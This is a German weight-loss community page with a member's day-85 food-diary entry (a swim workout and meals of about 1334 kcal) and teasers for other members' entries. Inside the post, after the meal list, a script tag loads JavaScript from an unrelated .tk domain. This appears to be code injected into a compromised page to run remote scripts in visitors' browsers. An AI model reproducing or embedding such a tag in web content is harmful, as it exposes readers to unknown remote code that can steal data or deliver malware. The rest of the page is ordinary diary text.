Zum Inhalt springen

Sie sind hier

Dienstag - der fünfundachtzigste Tag

0  0
Am von im Ernährungstagebuch geschrieben

Heute war wieder Sport angesagt : 4 Std Brustschwimmen ohne Pause

Ich musste ja schonmal vorsorgen, weil ich morgen bei einer Geburtstagsfeier bin mit Kuchen, Kino (Popcornfalle), Restaurant und Alkohol. Ayayay  das kann was werden. 

Mein Essen (ca. 1334 kcal) : 

Frühstück: Vollkorntoasts (ca. 300 kcal)

Mittagessen: Scharfe Tomaten-Zucchini-Nudeln, danach Sorbet (ca. 674 kcal)

Abendessen: Champignonpfanne mit Zucchinipuffer, danach etwas Schokolade (ca. 360 kcal)

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Dieser Eintrag beschäftigt sich (auch) mit einem oder mehrerer meiner Ziele: 
Vorheriger Ernährungstagebuch-Eintrag
Bild von Essen Tag Nr.10
Nächster Ernährungstagebuch-Eintrag
Bild von Leute ich brauche mal wieder eure Hilfe

Kommentare

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von Ramona60: heute auf die Hälfte meiner gewünschten Kcal Verbrennung gekommen. Tata 260 kcal abtrainiert. Eigentlich sollten es 500 kcal sein, aber piano piano. Mal schaun wie es morgen läuft. Standhaft...
Eintrag in ein Ernährungstagebuch von Candy2001: So, Tag zwei ist rum. Ich darf endlich frühstücken Gestern lief eigentlich ganz gut Ich muss nur dringend an meinen Mengen arbeiten Das Essen: Frühstück: 10:30 bis 10:40 Uhr - 500g Melone = 150...
Eintrag in ein Ernährungstagebuch von Ramona60: Fühle mich gut. Bin gespannt auf morgen. Gefühlt wiege ich 5 kg weniger  Realität sehe ich morgen auf der Waage. Bis heute habe ich jeden Tag meinen Crosstrainer benutzt und ordentlich Kcal verbrannt...
Eintrag in ein Ernährungstagebuch von veilchen: So gestern habe ich eine Runde Muskeltraining absolviert, dh eine Stunde, das tat echt gut, ich konnte wirklich merken wie sich danach alles einfach entspannt hat und meine haltung gerader wurde. ob...
Motivation von IQ136KG150: 1. ich werde ohne Rückenschmerzen längere Strecken gehen können und ohne völlig außer Atem zu sein in den sechsten Stock steigen (höher wohnt niemand ohne Fahrstuhl, ein Dank der deutschen...
Eintrag in ein Ernährungstagebuch von Josie: Hallo ihr Lieben, bei mir klappt es leider immer noch nicht so mit dem Essverhalten auf Dauer, wie ich mir das wünsche. Jetzt bin ich schon wieder so lange am Start, aber schwupp die wupp ein...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps